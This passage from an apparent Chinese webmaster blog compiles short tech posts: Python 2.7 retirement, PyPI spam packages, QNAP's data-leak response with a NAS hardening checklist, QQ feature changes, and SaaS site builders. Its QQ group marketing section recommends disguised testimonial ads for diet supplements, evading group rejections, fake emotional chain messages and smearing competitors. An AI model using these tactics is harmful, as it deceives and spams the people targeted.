平台功能。更多内容,还请移步至 PWAbuilder 官网查看。 PWA应用相对于APP来说,开发成本更低,因为PWA是可以直接把网页转换成PWA,不像APP需要单独开发,主机吧博客也有自己的PWA版本,不过目前PWA在国内主流浏览器中,并不支持,希望随着PWA的发展,国内也跟进吧。 #### Python 2.7停止维护:2020年将不再更新 如果你在使用Python 2.7,应该考虑将编写的脚本迁移到Python 3.x。Python 2.7在进入2020年后将不再得到维护。起初,官方并没有给出具体的日期表明何时停用Python 2.7。最近,停用日期已更新为2020年1月1日。Python 2,谢谢你这么多年来提供的忠诚服务。Python 3,现在该你上场了。大问题:Python 3并不向后兼容。这通常是一件好事。Python 3纠正了该编程语言中的一些根本性的设计缺陷和冗余之处,这应该会带来更简洁、更优雅的代码。但这也意味着Python 2.x代码并不自动与Python 3兼容。该如何开始入手?如果你在乎的代码仍使用Python 2,这完全可以理解。PyPI的流行软件包大多数现在使用Python 2和3,如今每天更多的软件包在不断添加中。另外,许多重大的Python项目郑重承诺很快停止支持Python 2。为了使过渡更顺畅,官方移植指南(https://docs.python.org/3/howto/pyporting.html)给出了建议,帮助用户将Python 2代码移植到Python 3。就因为Python 2.7在进入2020年后不再得到维护并不意味着你的应用程序或代码库会突然停止运行。如果你的项目很稳定很可靠,又没有任何安全方面的问题,何必修复并没有坏掉的系统?你甚至可以同时拥有Python 2项目和Python 3项目,并在不同的.conda环境中轻松管理它们。 #### Python 2终极版2.7.18发布:将不再更新,问世20年的神级编程语言退役 在Python2 问世 20 年、稳定版Python 2. 7 维护 11 年后,Python作者Guido Van Rossum本周宣布,即日起上线的Python 2.7. 18 将是Python2 的终结。 他建议程序员、企业/组织等尽快迁移到Python 3,以继续获得免费的第一手支持。 事实上,Python 2. 7 原计划在 2015 年就退役,但因为当时Python2 有大量Web用户,Python基金会讨论后决定延期 5 年,同时将Python 3. 4 的OpenSSL模块下放到Python 2.7,以免过期版本对互联网的潜在危害。 资料显示,Python3 早在 2008 年就发布了,可像是Facebook、Instagram、Dropbox这样的Python大客户,花费了很多年的时间才完成迁移。 就连Python作者供职(去年退休)的Dropbox, 2015 年才开始迁移 400 万行Python2 代码, 2018 年 9 月才彻底切换到Python 3。 #### Python开发者注意!小心Pypl软件库里隐藏的垃圾软件包 世界上最好的语言也逃不过垃圾软件包的围堵(狗头保命)。 前不久,Python官方软件库 PyPI 遭遇黑客攻击。黑客利用垃圾软件包的形式对PyPI软件库发起洪水攻击,BT 种子以及盗版电影名命名的软件包扎堆涌向了PyPI软件库。 当然,最好的语言不可能任由垃圾软件包欺压,只不过排除“隐患”的过程有点难度。 奇葩文件名牵出垃圾软件包“洪流” 这些垃圾软件包是由Sonatype高级软件工程师 Adam Boesch发现的。Adam Boesch在审核数据集时,发现了一个以热门电视节目『Wanda vision』(旺达幻视)命名的软件包。对于Python的官方软件库来说,这样的文件名显然是个可疑的“异类”。随后,Adam Boesch在软件库检索发现了异常的情况。 对一个名为"watch-army-of-the-dead-2021-full-on-line-movie-free-hd-quality"的垃圾邮件包进行分析后发现,它包含作者信息,以及来自 "jedi-language-server "PyPI包的一些代码。同时,在 PyPI 上搜索「full-online-movie-free」可以检索到大量诸如此类的软件包。 原来,从几周前开始,PyPI 库便陆续出现了大量的垃圾软件包。这些软件包除了垃圾关键词和可疑非法视频流网站的链接,还存在一部分从合法Python软件包中窃取功能代码和作者信息的垃圾软件包。 目前,Python软件包索引库维护者已开始清理这些垃圾软件包。 高危预警!谨防开发环境染“毒” 窃取功能代码和作者信息对一个官方软件库来说,意味着什么不言而喻。如果有Python开发者下载并打开这些垃圾软件包中的任何一个,都可能遭遇恶意软件或其他恶意代码。开发环境染“毒”导致的威胁更是让人难以预判。 早在2017年,国内某安全团队就曾披露过开发环境感染网络病毒,最终导致软件携带网络病毒并扩散的事件。近年来,盯上开发软件甚至是开发环境投递病毒的网络攻击更是屡见不鲜。 PyPI在今年2月时,就曾因一次大规模的垃圾邮件攻击,而遭到虚假Discord、Google、Robloxkeygens的洗礼。虽然PyPI 管理员会在发现可疑内容后及时处理,但由于PyPI任何人都可以发布内容的性质,很难从根本上杜绝垃圾软件包甚至是恶意软件包的出现。 写在最后 目前,PyPI 官方虽已清理了大部分垃圾软件包,但小安建议广大开发者下载使用时,仍需提高警惕谨慎行事。在使用前,较为安全的办法就是先检查验证,以避免意外中“毒”。 #### Python超越Java正式成为世界最流行编程语言 编程语言流行指数(PYPL)排行榜近日公布了 2019 年 2 月份的最新榜单,多年王者Java终于跌落神坛,Python则登上了No.1。 Python拥有简单、免费、兼容性、面向对象、库丰富等突出优点,这几年可以说是红得一塌糊涂,一路高歌猛进,主流深度学习框架比如TensorFlow、Theano、Keras等等都是基于它开发的。 圈内知名网站Stack Overflow的数据显示,在去年 6 月份,Python的月活用户就超越了Java、JavaScript成为第一。IEEE Spectrum也在 2018 年度顶级编程语言排行榜上将Python列为第一,领先C++、C、Java、C#。 PYPL的排行依据是编程语言在Google上相关搜索的频率高低,原始数据来自Google趋势。 在最新一期榜单上,Python的份额高达26.42%,比去年同期增长了5. 2 个百分点,是势头最猛的,其他最好的也只增长了0. 3 个%,还是一些小众语言。 被挤到第二的Java目前份额为21.2%,同比下跌1. 3 个百分点,不过它的优势也依然很大,排名第三的JavaScript目前只有8.21%,而且还跌了0. 3 个百分点。 C#升至第三占7.57%,PHP则跌了两名来到第五占7.34%,之后是C/C++、R、Objective-C、Swift、Matlab。 另外,IDE排行榜和数据库排行榜变化不大,尤其是前几名: 著作权归作者所有。 商业转载请联系作者获得授权,非商业转载请注明出处。 作者:站长之家编辑 链接:https://www.chinaz.com/news/2019/0218/992125.shtml 来源:站长之家 #### QNAP回应入侵事件:将1.7TB数据泄露归因于“用户失误” 事件复盘:一次“非典型”入侵引发的安全争论 针对近期黑客组织“KaruHunters”声称入侵QNAP NAS设备并窃取1.7TB数据的事件,制造商威联通(QNAP)于12月22日发布官方澄清公告。公告核心结论将此次事件定性为 “个案” ,并将其根本原因指向用户端设备的运维疏失,强调其QTS操作系统与myQNAPcloud远程访问服务本身 “仍然安全”。 这一回应迅速将事件焦点从“产品漏洞”转向了“用户实践”,在NAS用户与安全社区中引发了广泛讨论:这究竟是一次可以避免的偶然事件,还是暴露了消费级NAS产品在默认安全姿态与用户教育方面存在的系统性问题? 厂商声明深度剖析:QNAP划定的“责任边界” 根据公告,QNAP从技术层面勾勒了事件的“官方画像”: 涉事设备特定:为一台型号较旧的 TS-228,运行已停止主流支持的 QTS 4.3.6 旧版系统。 攻击路径分析:设备因 “直接对外连线并暴露于公网” ,且在 “未启用QNAP提供的防护措施” 的情况下,遭未授权访问。 核心服务撇清:强调用户 “未启用myQNAPcloud安全联机服务” ,并断言该服务平台本身无漏洞、未被入侵,驳斥了黑客取得平台级权限的报道。 简言之,QNAP的叙事逻辑是:一个运行老旧系统、未遵循安全最佳实践(暴露公网+禁用安全功能)的用户设备,成为了攻击目标。责任在于用户,而非产品。 【主机帮】技术复盘:隐藏在“个案”背后的共性风险 尽管QNAP试图将事件影响最小化,但作为安全从业者,我们必须穿透“个案”的表象,审视其中暴露的、具有普遍性的安全隐患: 1. “旧版本系统”的幽灵 涉事设备运行的QTS 4.3.6是一个已停止安全更新的旧版本。这意味着它可能包含已知但未修复的漏洞(CVEs)。对于攻击者而言,运行旧版系统的、暴露在公网的NAS设备,正是自动化扫描与攻击工具最优先、最易得的目标。用户未能更新系统,与厂商对旧版本停止支持的政策,共同构成了风险链条。 2. 公网暴露的“致命诱惑” 将NAS设备的Web管理界面或服务端口(如SMB、AFP、SSH)通过路由器端口转发直接暴露在公网,是极高风险的行为。这相当于将您的数据保险柜放在人来人往的街头,仅凭一把密码锁(往往还是弱密码)守护。攻击者无需攻破任何云服务,只需扫描整个互联网的相应端口,即可发现并尝试入侵这些设备。 3. 安全功能“未启用”的悖论 QNAP指出用户未启用其提供的防护措施(可能指防火墙、IP访问限制、QuFirewall等)。这引出一个关键问题:对于面向普通消费者和中小企业的产品,核心安全功能是否应以“默认启用”或“强制引导配置”的方式交付? 许多用户根本不知道这些功能的存在,或因其复杂性而选择忽略。 4. myQNAPcloud的“安全联机”与替代方案 QNAP力推的myQNAPcloud安全联机服务(可能基于Cloudflare Tunnel或类似反向隧道技术)确实提供了一种更安全的远程访问方式,因为它无需在路由器上开放端口。然而,用户出于对云服务可靠性的担忧、或对厂商锁定(Vendor Lock-in)的顾虑,可能不愿使用。这迫使安全意识强的用户必须在 “使用厂商的便利云隧道” 和 “自建更复杂的VPN(如WireGuard)” 之间做出选择。 【实战指南】给所有NAS用户的紧急安全加固清单 无论您使用的是QNAP、群晖还是其他品牌的NAS,都应立即遵循以下“最低限度”安全实践,避免成为下一个“个案”: 第一步:网络隔离与访问控制(立即执行) 立即关闭公网端口转发:登录家庭/企业路由器,检查并删除所有指向NAS设备的端口转发规则。 启用并配置内置防火墙:在NAS系统中,启用防火墙功能,严格限制仅允许受信任的本地IP段(如 192.168.1.0/24)访问管理界面和服务端口。 禁用默认admin账户:创建并使用一个全新的、高复杂度的管理员账户,并完全禁用名为“admin”的默认账户。 第二步:系统与应用硬化(今日完成) 立即更新系统与套件:将NAS操作系统及所有安装的应用程序更新至最新版本,确保所有安全补丁已安装。 启用双因素认证(2FA):为所有NAS用户账户,尤其是管理员账户,启用基于TOTP的双因素认证。这是阻止凭证填充攻击的关键。 审核用户与权限:遵循最小权限原则,删除不必要的老旧账户,检查并收紧共享文件夹的访问权限。 第三步:建立安全的远程访问通道(本周末前完成) 首选方案:自建VPN:在路由器或一台始终在线的设备(如树莓派)上部署 WireGuard 或 Tailscale 等现代VPN解决方案。通过VPN接入家庭网络后,再像在本地一样访问NAS。 次选方案:使用厂商安全隧道:如果您信任厂商,可启用类似myQNAPcloud联机服务,并务必在其中也启用所有可用的安全选项(如设备验证、访问日志)。 严禁方案:直接端口映射:重申,绝对不要将NAS的5000(HTTP)、5001(HTTPS)、22(SSH)、445(SMB)等管理或数据端口直接映射到公网。 对厂商的期望:超越“用户教育”的主动安全设计 此次事件也应促使NAS厂商反思其安全责任: 更积极的旧系统退役策略:对于已停止支持的旧版本,能否通过更醒目的、甚至强制性的升级提醒,推动用户迁移? 安全配置的“强制引导”:首次设置时,能否通过向导强制用户设置防火墙策略、创建非默认管理员、并选择一种安全的远程访问方案? 默认安全状态的提升:能否将防火墙、登录失败锁定等功能设为默认开启,而非让用户去寻找并打开? 结论:没有“个案”,只有被忽视的“常态”风险 QNAP将此次1.7TB数据泄露事件称为“个案”,从技术溯源角度看或许成立。但从安全生态视角看,它绝非孤例,而是无数台因配置不当、更新滞后而暴露在公网中的NAS设备所面临风险的集中体现。 对于用户而言,必须彻底摒弃“我的设备小,黑客看不上”的侥幸心理。自动化攻击脚本从不挑剔目标。保护数据安全的第一步,永远是承认风险的存在,并采取那些看似“麻烦”的基础防护措施。 对于行业而言,不能仅仅满足于在事件发生后发布澄清公告。将安全能力“内置”而非“可选”,将用户引导至“安全路径”而非“危险捷径”,才是对用户和数据真正的负责。在人人皆可成为数据管理员的时代,产品的安全设计必须像它的功能一样直观和强大。 **(主机帮提醒:您的数据价值远超设备本身。请立即检查您的网络存储设备,花一小时完成加固,避免未来一年的追悔莫及。) #### QQ 秀正式下线啦!红钻已于去年停止充值! 11 月 9 日消息,在最新的 PC 版 QQ 9.5.2 版本中,QQ 秀已经正式下线,用户将无法再看到自己的 QQ 秀装扮形象。 ▲ 图自网络 QQ 秀最早出现在 QQ 2000C Bulid 1230 beta2patch 版本,是一个 QQ 虚拟形象设计系统。QQ 秀商城的虚拟服饰、场景和人物形象可以用来装扮用户在 PC 端 QQ 中显示的虚拟形象。 而 QQ 秀红钻贵族是腾讯对 QQ 秀的一项服务,资费 10 元/月,拥有红钻尊贵标志,可免费使用全场 QQ 秀等。IT之家了解到,根据腾讯客服官方的说法,QQ 秀红钻贵族已于去年停止续费充值。 腾讯客服确认 QQ 秀已下线,并推荐用户使用手机 QQ 中的厘米秀,该功能是腾讯为手机 QQ 推出的虚拟形象设计系统。 #### QQ 邮箱“群邮件”功能也要停了 11 月 18 日消息,昨日 QQ 邮箱发布 QQ 邮箱「群邮件」功能下线公告,公告称因业务调整,“QQ 邮箱群邮件”功能将于 2022 年 12 月 10 日起终止服务。 公告还称,该功能终止服务后,届时用户依然可查看历史的群邮件,但不可再发送新的群邮件或查看 QQ 群列表。官方还称,用户可以将多位收件人保存为邮件联系人组,便捷的地发送邮件。 据官方介绍,QQ 群邮件是 QQ 邮箱基于 QQ 群用户推出的一项新的邮件服务,它充分利用 QQ 群的资源,以论坛帖子的形式组织对于某一话题的讨论,QQ 群成员回复的邮件内容将会聚合在同一个邮件中,对群内全体成员可见。在这里,你可以自由发表观点,讨论问题,就像论坛一样。 QQ 邮箱最近还调整了容量策略。现阶段邮箱初始容量为 2GB,最多可免费提供 16G 的邮箱容量,也就是翻倍 3 次,如果你需要用到更多容量则需付费将邮箱容量和文件中转站升级至 2048GB,费用为 15 元每月 #### QQ严打网络赌博违法犯罪活动 封停3万个违规群 5月13日 消息:今日,QQ安全中心微信公众号 发布《关于严厉打击利用 QQ 平台进行赌博违法犯罪活动的公告》。 公告称,QQ 安全团队近日协助广西梧州警方成功侦破一起红包建群开设赌场案,捣毁以周某林为首的8人犯罪团伙,获取与案件关联的数据流水200多万条,涉案资金400多万元。据悉,该团伙通过大量发布赌博开盘信息吸引赌徒,通过非法外挂软件组织网络赌博。 QQ方面表示,一直以来对包括网络赌博在内的黑色产业链“零“容忍。近期共计封停3万个涉赌违规 QQ 群,处罚2.6万个涉赌违规 QQ 帐号。此外,QQ 安全团队共接到赌博举报10余万条,并已进行相应处置。 公告强调,形式隐蔽、招数狡诈的赌博骗局层出不穷,除常见的出售非法外挂软件、拉人入群、“玩托儿"引诱等套路外,近期演变出一种新型赌博方式:以营利为目的的“抢红包"群,犯罪团伙制定赌博规则充当庄家,赌徒则通过面对面红包下注。其群主行为等同于开设赌场“聚众赌博",属于违法犯罪行为。 #### QQ公众空间认证重新开放申请 自媒体朋友可以试试 QQ空间在4年前(2016年)开放过一次认证,但仅仅开放了不到一天,又关闭了,这一关闭就是4年。今天QQ公众空间又重新开放认证啦。 申请认证需要满足6个条件: 1.空间内有5条视频 2.空间头像,昵称,类别及介绍需要填写完整 3.个人信息或企业相关资料提供审核 4.确保空间名称、描述及内容垂直相关 5.确认该号码的手机QQ设备锁已开启 6.针对自媒体用户开放申请,空间权限为公开状态 从要求来看,这次认证用户主要是针对自媒体的,而且需要制作短视频的媒体,如果你是玩抖音快手的很适合QQ空间认证,配合上QQ空间发布,可以起到不错的效果。 QQ认证空间地址:https://h5.qzone.qq.com/brand/apply/index QQ校园空间认证地址:https://h5.qzone.qq.com/qzone/campus/register 微视认证公众空间地址:https://h5.qzone.qq.com/brand/apply/weishiapply   #### QQ在线临时对话代码失效了怎么办? 最近主机吧发现QQ对话的临时代码失效了,原先的http://wpa.qq.com/msgrd?v=3&uin=176363189&site=qq&menu=yes 打开后出现 抱歉,无法发起临时会话,您可以 添加对方为好友以发送消息 具体原因主机吧不清楚,这里主机吧给大家推荐两个解决办法: 1 把原先的代码改为tencent://message/?uin=176363189&Site=Senlon.Net&Menu=yes 这个代码主机吧试过,在PC电脑端打开是没问题的,不过手机端不行。 2. 设置QQ加密临时对话,具体操作如下: 进入https://shang.qq.com/v3/widget.html 点左边设置: 选择安全级别:安全加密 保存 点左边个人QQ通信组件,就可以就可以看到加密过后的地址   把地址http://wpa.qq.com/msgrd?v=3&uin=176363189&site=qq&menu=yes替换成http://sighttp.qq.com/authd?IDKEY=03a0125d723a9439dffbd4efc96f3d9438b64554c3a56492 即可。   第二个方法主机吧测试了下,是可以用的,不过后来又不行了,具体各位同学试试。       #### QQ大规模账号被盗 6月27日 消息:今日,#QQ盗号#一事登上热搜,目前该话题阅读量已近2亿,讨论超1.7万。 据网友反馈,自己的不少好友或QQ群成员均在昨晚或今日凌晨发送了带广告的图片或视频,疑似被盗号。 主机吧也收到不少。 据了解,早在今年5月,就有网友反馈称,自己部分好友的QQ出现了被盗的情况,具体情况与上述一致。 对此,腾讯官方回应称,主要原因系用户扫描过不法分子伪造的游戏登录二维码并授权登录,该登录行为被黑产团伙劫持并记录,随后被不法分子利用发送不良图片广告。已第一时间组织安全技术力量,积极对抗黑产作恶,目前受影响范围已得到控制,受此事件影响的用户帐号也于今日凌晨陆续恢复正常使用。 对此,收到了大量网友吐嘈 #### QQ推出QID名片功能:非常适合推广号 最近推广圈比较火的应该是QQ推出QID名片功能了,这个功能简直是让QQ重新火了一把,为什么这么说呢? 因为QQ的QID功能,非常类似微信ID,简答讲就是一个搜索名片的作用,用户可以自定义自己QQ的ID,最低可以设置7位数,数字字母都可以,一个QQ号仅能对应绑定1个QID,全网唯一,普通用户仅可设置8-10位数,而SVIP则可设置 7-10 位,QID确认设置后,以后QQ好友添加你,不仅可以通过QQ号,还可以在QQ内直接搜专属ID就能找到你添加好友,同时可以生成专属身份卡,如同微信中名片一样。这就非常适合站长使用了,取一个好记或者品牌相关的QID,可以让别人很容易找到你的QQ帐号,与QQ帐号相比,想要添加你的QQ再也不用复制粘贴了。 主机吧在手机QQ搜索上试了下,是可以搜到QQ帐号的,而PC电脑端的搜索却无法搜到,可能后期版本可以会处理好吧,目前QID只能用来搜索QQ,却无法用来登陆用,不知道QQ后期会不会实现登陆呢? 总之QID是非常适合做营销的人用的,客户再也不用记你的十几位数QQ号码了,只要记得拼音啥的就可以了,非常有利于推广。 不过需要注意的是,QID确认设置后,QQ号一旦被封号,冻结、QID也就没有了,并且QID后续想修改也不是随意的,90天内SVIP用户可使用改名卡修改1次,原ID保留3天,超过3天直接释放,不是SVIP用户就没得改了,这一点还是很腾讯的! 最后附上QID设置流程: 打开手机QQ-左上角头像-设置-账号管理,点击QID选项,选择它,再点击设置ID,根据要求设置自己的ID即可。 目前QID已经非常多的用户在搞了,很多靓号被人注册了,如果你是企业赶紧行动起吧,弄一个企业拼音或者好记的QID非常有必要的。   #### QQ浏览器如何去掉点两下自动搜索 使用QQ浏览器访问网页的时候,点两下鼠标总是会自动搜索,很烦,如何解决呢? 方法如下: 右上角三条线那里    应用中心 点管理应用 找到划词搜索插件,卸载掉即可。 #### QQ空间被封解封教程 网上很多朋友寻找QQ空间解封教程,方法什么的,多如牛毛但是很多方法也并不是很实用,本文分享一下个人认为还是相对方便靠谱的QQ空间解封方法。这个教程只适用于解封非好友不能访问的空间。首先先用需要解封的QQ绑定微信号:步骤二:步骤三:步骤四:空间被封禁的时限是根据你空间里面违法内容判定是否永久关闭,如果你发现得及时,被封禁时间也不长,那么也不想麻烦就等待它自动解开!反之你要用这个QQ号的话,最好尽快解开。原文来自卢松松博客:http://lusongsong.com/info/post/10742.html #### qq群营销的方法 QQ群营销发广告的精髓就三点,私聊、讨论组和群邮件 私聊的好处:产生信任、单独交流、有问题直接回答; 讨论组的好处:强制广告但这个不能信任度; 群邮件的好处:就是发一封邮件群里的所有人都能看到; qq群营销方法分以下四个步骤:寻找目标QQ群,加入目标QQ群,套近乎、做潜伏,发广告。 1.寻找目标QQ群 1)根据关键字在QQ群搜索或者类似于百度这种搜索引擎里搜索 “目标群”,比如:健康群,养生群,保健群,广州健康群等 。 2) 根据群人数、群活跃度、地域进行筛选,活跃度不高的群说明群成员对群感情不深,信任度也不深;相同区域的群成员可以举办线上线下的活动进行推广宣传。 3) 验证消息要真诚带有感情色彩,与群主题相关。 4) 加群是一件枯燥的事,也常会遇到拒绝,遇到拒绝但是又必须加入可以隔天换个昵称或者号码重新加入,保持天天有群加 。 5) 渗透群与群主进行互助合作,同时可以与群活跃成员成为好友互助互利。 2.聊天建立信任关系,进行推广和宣传以及营销 很多人在QQ群中发私聊,发讨论组,发群邮件都没有人回复,这很正常,千万不要盲目去行事,需要具备一套QQ群营销话术。 1)发广告 现在QQ群里面到处都能看到发广告的,大家都反感。那就要掌握几种好的推广技巧。 推广技巧核心:先求感情,在追效果。所以QQ推广是一个长久的战斗,感情这东西不是一天两天培养出来的。 少发、精发:现在的QQ推广的硬性广告是越来越多了,大家也就开始了反感。因为也就出来了软文推广或者植入性广告。比如做自然拥有的减肥交流群:最近一段时间我特别的开心,减了好几斤。是我妈给我买的,好像是叫巴西阿萨伊减肥胶囊,效果挺好的。大家交流1分钟后:哦,对,这个是减肥膳食营养品,是这个网站,大伙看看。很自然的一个流程,这种软性的隐蔽广告,不仅受欢迎,而且还会热议。 利用群公告、群共享、群空间:在群公告那一栏,会有一个图片显示的,这个地方是最新上传的图片到空间上,你完全可以利用这个技巧,不过要你持续关注群。另外自己的群共享当中放一些自己的分享资料,这个就是要让你自己持续不断的关注他。 依照上述方法,加入几十个上百个群,设定好周一到周日,每天该哪几个群发广告,就去发,这样每天都能发,一百个群的话,按平均100人来算,长期下去,就会得到很多认同。 2)发邮件 这个群邮件也是一个很好的方法,免费的邮件不仅可以通知到人,而且转化率还高。但每天发不要超过7-8个群就可以了,不会让人反感 3.QQ群营销的方式 在QQ群里,赤裸裸的广告轰炸,并不能获得好的营销效果,QQ群营销更需要一种曲径通幽的方式。 1)“守株待兔”式 “守株待兔”式其实就是直接把自己的群名片改成广告信息,在群名片中把自己的姓名、业务、联系方式、公司介绍等填写准确。 2)“QQ表情”式 QQ表情是大家经常使用的,一个很有趣的QQ表情,上面挂着一个网址。但是不是每一个QQ表情都可以做营销的,要是一个QQ表情别人看了觉得没什么意义,他就不会收藏、转发你的表情。所以,一个QQ表情确实很有趣,很有意思才能拿来营销,就像上面那个一样,明知道有网址,还是让人忍不住要转发。 3)“助人为乐”式 “助人为乐”式是指平时在群里积极地回答别人的问题,尽可能地帮助别人。坚持一段时间下来,相信不仅会让对方记住了你,还会对你产生好感,当信任产生,有什么是不可能的呢? 4)“转发”式 有段时间,QQ群上经常流传着这样一则信息:“某某家里人重病,正在XX医院做手术,家里人想见他最后一面,让他速回来,有知情者请联系他舅舅,电话:131XXXXXX。爱心接力,大家帮转!”这则信息里面,出现了XX医院,这是营销点所在。后来得知这其实是个营销骗局,不得不佩服这则信息始作佣者的厉害。信息直接出现姓名、电话,显得真实,让人找不到疑点,然后利用人们的同情心理,转发一下也很容易,你看到这种信息的频率证明了它被转发了有N多次。 5)“揭密”式 这种方式,可能是以文字的形式出现,也可以是图片的形式传播,其内容都是揭示一些内幕性的内容,很吸引人眼球,达到打击竞争对手、正面宣传自己的目的。由于它的内容能让人警醒,会让人情不自禁地帮它转发。 营销靠的是创意,无论是网络营销还是实体营销,好创意才能带来好的营销效果。 4.群沟通方式 一个安静如水的群,发挥不出作用,群发广告,除了天时地利人和,重点是广告定位与广告技巧,当广告发到让别人感觉不像是广告而是诱惑的时候,就是最高境界。 学习群可以做讨论、培训形式,产品群可以定期提供活动推广产品,服务群则可以提供服务资讯,交友群则需要创造良好的交友氛围……采用的方法需要根据群的特点来进行。 定期组织相关话题讨论,话题起初开展都会有不顺利的时候,但是长期坚持下去,让群众形成习惯,慢慢就有一定的人气。 进群后除看群名片外,还可以看一下群之前的聊天记录,共享文件,群活动,这样对群有比较初步的了解。 进群很重要的是获取一些群的信息,对自己的专业及业务开展都有好处,比如群通讯录,分类整理到自己联系列表中,可以下载群里面共享的对自己有用的资料,可以从历史聊天记录中寻找与自己业务相关的群成员。 群发言时掌握好时机,如果群里的话题自己刚好很熟悉,就发表自己专业的见解或 分享;如果是自己主动发言,可以发布比较新鲜的与群相关的信息,如有链接,在链接前说明主题内容,也可以在群共享、群图片中分享一些群成员感兴趣的行业、职业、业务方面的文章、图片等,如果公司有比较重要的活动,除可通过聊天发言宣布外,群共享、群图片,甚至群邮件都是很好的传播方式,如确实对群成员有益及非常需要的,可联系群主发布群公告,这样宣传的效果就更好,每一次发言,每一次分享,你的群名片都会出现一次,这无疑是很好的宣传展示机会,所以好好利用这种机会吧,它很可能给你带来业务 在群里发言虽然理论上大家都可以看到,但有时信息太多就淹没了。这就要注意群成员间直接的沟通。遇到与自己业务相关的潜在客户、供应商、行家高手、热心且人脉广的群成员等最好的方式是申请加为好友,然后利用私下点对点的沟通、群里组织的活动、甚至跟对方私下约会等方式进一步互相认识,有机会的有 缘的还会成为真正的朋友,即使你只交到了那么一两位朋友都可能比你加十个、几十个群,发几千次言有价值的。 QQ设置 QQ资料的完善 1)头像设置:无论是在虚拟网络还是现实生活中以貌取人都很常见, QQ头像是我们给别人的第一印象,最好是使用最上相真人头像,提高我们的印象分和可信度降。 2)名字设置:可以用真实的名字,这样容易建立信任感;或者好听易记的富有个性的。 3)签名设置:可以直接点明自己的公司是干什么的,有什么产品,产品功效是什么,还有公司网站链接 。 4)状态设置:添加自己的电话以及网络连接。 5)其他资料:可以尽可能的翔实一些,比如年龄、职业、住址、邮箱等给人一种真实的感觉,空间、签名、相册也时常更新下。 QQ好友 可以加现有客户为好友,建立客户档案分组,维护好老客户;同时主动出击创造新客户,在查找里定义一些关键字等条件搜索自己的目标客户。 QQ空间 1.QQ日志 根据自己的行业经验以及理论知识撰写一些精彩的软文日志分享给QQ好友,在分享的同时做好推广宣传,质量上乘肯定会被转载,再者也需要多分享好的文章,图片,视频 。 2.QQ相册 大家想想自己在在进入一个陌生人的空间后最想做的是什么?当然是进入这个人的相册,然后看一下他真实的一面。靠着大家普遍的好奇心,我们可以在自己的相册中加上几个关于我们公司或是产品的图片,比如放上几张乳清蛋白质粉或大豆蛋白质粉的照片,然后上面打上我们自然拥有的LOGO,标题再写的吸引人一些,给我们的宣传做出贡献。 3.QQ留言 平常我们可以加上一些名人的QQ,或是受关注较大的QQ,然后在他们发表容易引起争论的文章的时候,果断留言,并且尽早留言,使自己的留言能够做到“沙发”的位置,如此一来我们就能借助他人高流量的空间,然后间接的推广一下自己的网站,这可比在外面那些论坛留言,效果强多了。 #### QQ邮件订阅中心下线 QQ邮件订阅中心诞生于2011年,是一款通过网站RSS抓取的内容工具,可以实现Email里就能收到高质量的免费报刊/杂志/声像等咨询内容,近日即将被腾讯淘汰下线! 如果有做过网站的朋友一定会知道QQ邮件订阅中心中心,我们在浏览很多个人博客的时候,都会看到一些QQ邮件订阅功能。 QQ邮件订阅功能曾一度是很多站长推广的渠道,背靠腾讯邮箱数亿用户和日活,在QQ邮件订阅中心被订阅之后,所有订阅QQ邮箱用户只要一打开QQ邮箱就能看到你的logo也可以设置成头像或你的著作封面,并且QQ邮箱还可以定期推送您的博客内容,督促粉丝们一直关注博客的动态,是一个难得提高知名度的推广渠道。 有了QQ订阅功能相当于网站有了自己的粉丝关注渠道,可惜随着移动大浪潮冲击,很多原本PC上非常火的功能,慢慢的被淘汰掉了,这次QQ订阅功能也是这个原因,站长们想要获得域外流量的渠道越来越难了。     #### rushb中文网的站长,因病去世,年仅32岁。 今天刷抖音看到一条信息,说rushb中文网的站长,因病去世,年仅32岁。 rushb中文网是一家CSGO / 反恐精英攻略网站,算是业界比较知名的了,不过这几年网站的流量真的一言难尽,主机吧查了下,rushb中文网日IP估计不过三千,在这种互联网时代,真的付出跟回报不成正比。 该站长同时还运营了哔哩哔哩视频,与网站流量相比,视频的流量要高很多。 所以,现在网站运营确实是一个夕阳产业,唉! #### SAAS建站平台如果自己倒闭了,那些用户的网站怎么办呢? 最近几年做网站的人很少了,所以出现了一些SAAS建站平台倒闭的情况,那些在SAAS建站平台建的网站该怎么办呢? SAAS建站平台如果倒闭了,那首先如果我们的网站数据都在平台的服务器上,那基本什么都没有了,或者只能提取一些静态数据包出来,图文这些,而网站后台基本是没有了,因为SAAS平台不可能提供源代码给你的,这就是一个SAAS建站的通病。 如果你不在他们那里续费了,不准备在他们平台做下去了,那原来的网站也会没有了,只能重新做一个新的,而你能得到的也只有一个域名属于自己的域名,有些小白同学可能连域名都拿不回来。 因此,SAAS建站只适合短期,没有什么网站运营经验的同学使用,从长远角来看,建立自己的独立网站是非常必要的,一个独立的网站需要独立的顶级域名、独立的服务器管理(也可以是云服务器)、独立的网站源代码。 当然,如果必要用SAAS建站的话,一定要选择大品牌公司的开发的平台,比如果百度aipage这些。 #### SAAS建站的对用户有哪些优缺点 SAAS建站(Software as a Service for website building),即“软件即服务”的网站建设模式,是一种基于云计算技术的在线网站构建服务。在这种模式下,网站构建工具和平台作为服务提供给用户,用户无需购买、安装和维护任何软件或硬件,只需通过网络连接即可访问和使用这些工具来创建和管理自己的网站。 最近有幸接触一位SAAS建站的用户做防御,所以主机帮根据自己的经验来给大家盘点下SAAS建站对用户来说,有哪些优缺点,以下是对这些优缺点的详细分析: 优点 低成本与高效益: SAAS建站通常采用订阅制,用户只需按年或按月支付一定的费用,即可享受完整的建站服务,无需承担高昂的硬件和软件购买成本。 由于SAAS建站服务商会持续优化和升级系统,用户无需自行进行复杂的维护工作,降低了整体运营成本。 易用性与灵活性: SAAS建站平台提供直观的界面和丰富的模板,即使是没有编程经验的用户也能轻松上手,快速创建和部署网站。 用户可以根据自身需求灵活调整网站内容和布局,实现个性化定制。 安全性与稳定性: SAAS建站服务商负责维护服务器和数据安全,采用先进的加密技术和安全协议,确保用户数据的安全性和隐私性。 服务商还提供定期的系统维护和升级服务,确保网站始终处于稳定运行状态。 一站式解决方案: SAAS建站平台集成了网站构建、域名注册、主机托管、数据备份等一站式服务,简化了网站建设的复杂流程。 用户无需与多个供应商打交道,节省了时间和精力。 强大的功能与支持: SAAS建站平台通常具备丰富的功能模块和插件,满足用户多样化的需求。 服务商提供专业的技术支持和客户服务,确保用户在使用过程中遇到问题能够及时得到解决。 缺点 依赖性与限制性: 用户高度依赖SAAS建站服务商提供的平台和服务,一旦服务商出现问题或终止服务,可能会对用户造成较大影响。 部分SAAS建站平台在功能和定制性方面存在限制,可能无法满足用户所有需求。 数据归属与迁移问题: 